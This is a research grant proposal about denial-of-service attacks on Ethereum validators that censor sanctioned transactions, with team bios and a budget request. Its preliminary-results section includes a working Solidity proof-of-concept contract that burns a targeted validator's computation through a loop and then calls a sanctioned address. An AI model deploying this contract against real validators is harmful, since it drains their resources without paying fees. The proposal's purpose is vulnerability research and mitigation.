Denial-of-Service Implications of Blockchain Censorship

Contact

Abstract

Blockchain censorship not only impacts neutrality, but also security. Censorship implies that blockchain validators become vulnerable to Denial-of-Service (DoS) attacks, as to-be-censored transactions are not liable to pay transaction fees. Thus, an attacker can potentially create computationally complex transactions that tax the resources of validators, without paying for the computational resources which were used to validate the transactions.

Our goal is to classify potential DoS attack vectors that arise when censoring validators are present in the network, benchmark their effect on validators’ computational resources and revenue, and find mitigations for them.

Objectives

What are you hoping to accomplish with this grant?

Our proposal aims to produce prototype attacks which rely on censorship as a novel and cheap DoS attack vector against censoring validators.

To evaluate these attacks, we will create an open-source benchmarking tool which will measure the resource consumption required for transaction validation by a given Ethereum client. Furthermore, the tool will be able to fork Ethereum’s state at arbitrary points in time to quantify the effect of the blockchain’s state on validation time and memory consumption.

We will evaluate potential mitigations for the attacks.

How do you define and measure success for this project?

The success of the proposal can be measured using multiple metrics.

Outcomes

How does this project benefit the greater Ethereum ecosystem?

The Ethereum community will benefit from the project in several ways.

Grant Scope

What is the expected output?

We aim to deliver the following:

Project Team

The project team is led by Aviv Yaish. It consists of four people, three PhD students and a professor. The PhD students working on the project are Aviv Yaish, Kaihua Qin and Liyi Zhou. The professor is Arthur Gervais, Associate Professor at UCL.

Background

The project team has extensive experience in the field of blockchain research.

Aviv Yaish is a PhD student at The Hebrew University, under the supervision of Aviv Zohar. He has previously worked on the economics and security of blockchains, including a recent paper showcasing an attack on Proof-of-Work Ethereum and another work on the economics of transaction fee mechanisms. For more details on Aviv’s previous work, please refer to his twitter and Google Scholar page.

Arthur Gervais is an Associate Professor at University College London (UCL) and a leading expert in the field of blockchain security. He has published numerous papers on the security and privacy of blockchain systems, including On the security and performance of proof of work blockchains, a top-100 information security paper of all time. For more details on Arthur’s previous work, please refer to his website and Google Scholar page.

Kaihua Qin is a PhD student at Imperial College London (ICL), working with Arthur Gervais. Kaihua’s body of works focus on the security of decentralized finance protocols, including a recent paper on the blockchain dark forest and an empirical study of DeFi liquidations. For more details on Kaihua’s previous work, please refer to his Google Scholar page.

Liyi Zhou is a PhD student at UCL, working with Arthur Gervais. He has previously worked on blockchain security and privacy research. Among his recent works, one can find a paper on recent DeFi Attacks and a paper on high-frequency trading on decentralized on-chain exchanges. For more details on Liyi’s previous work, please refer to his Google Scholar page.

In addition, the project team has published numerous papers in top-tier academic venues, including ACM Conference on Economics and Computation, IEEE Symposium on Security and Privacy, USENIX Security Symposium, and ACM Conference on Computer and Communications Security. Overall, the project team has the necessary experience and expertise to undertake the proposed research project.

Methodology

How do you plan to achieve your research objectives?

Our general research methodology involves formulating end-goals which are novel, yet concrete and feasible. These goals are then broken down to reasonably-sized milestones. These milestones are detailed in the Timeline section.

We have begun prototyping our milestones and producing first drafts for each one. Thus, we are sure in our ability to bring the project to fruition. These rough versions will be fleshed-out and polished, until reaching their final, finished forms.

Preliminary Results

We produced the following preliminary results, as a proof-of-concept for the project:

A figure depicting the basic attack

An implementation of the basic attack

pragma solidity >=0.7.0 <0.9.0;
contract CensorshipDoSAttack {
    mapping (address => bool) private _shouldDoS;

    /// @notice Creates a set of the validators to DoS.
    constructor() {
        // Add the validators you would like to DoS here:
        _shouldDoS[AddressToDoS1] = true;
        // _shouldDoS[AddressToDoS2] = true;
        // _shouldDoS[AddressToDoS3] = true;
        // ...
    }

    /// @notice Call this function to execute the attack.
    /// @param i The number of complex iterations.
    function DoS(uint32 i) external payable {
        // Check if the current validator should be DoSed:
        bool shouldDoS = _shouldDoS[block.coinbase];
        assembly {
            if shouldDoS {
                // The computationally complex part of our TX:
                for { } gt(i, 0) { i := sub(i, 1) } {
                    pop(extcodehash(xor(blockhash(number()), gas())))
                }
                // Replace "CensoredAddress" with your favorite
                // sanctioned address!
                pop(call(gas(), CensoredAddress, 1, 0, 0, 0, 0))
            }
            stop()
        }
    }
}

Timeline

The project is expected to take 12 months to complete, with the following timeline and milestones:

Budget

For this project, we request partial support for the PhD students working on this project, amounting to $72,000.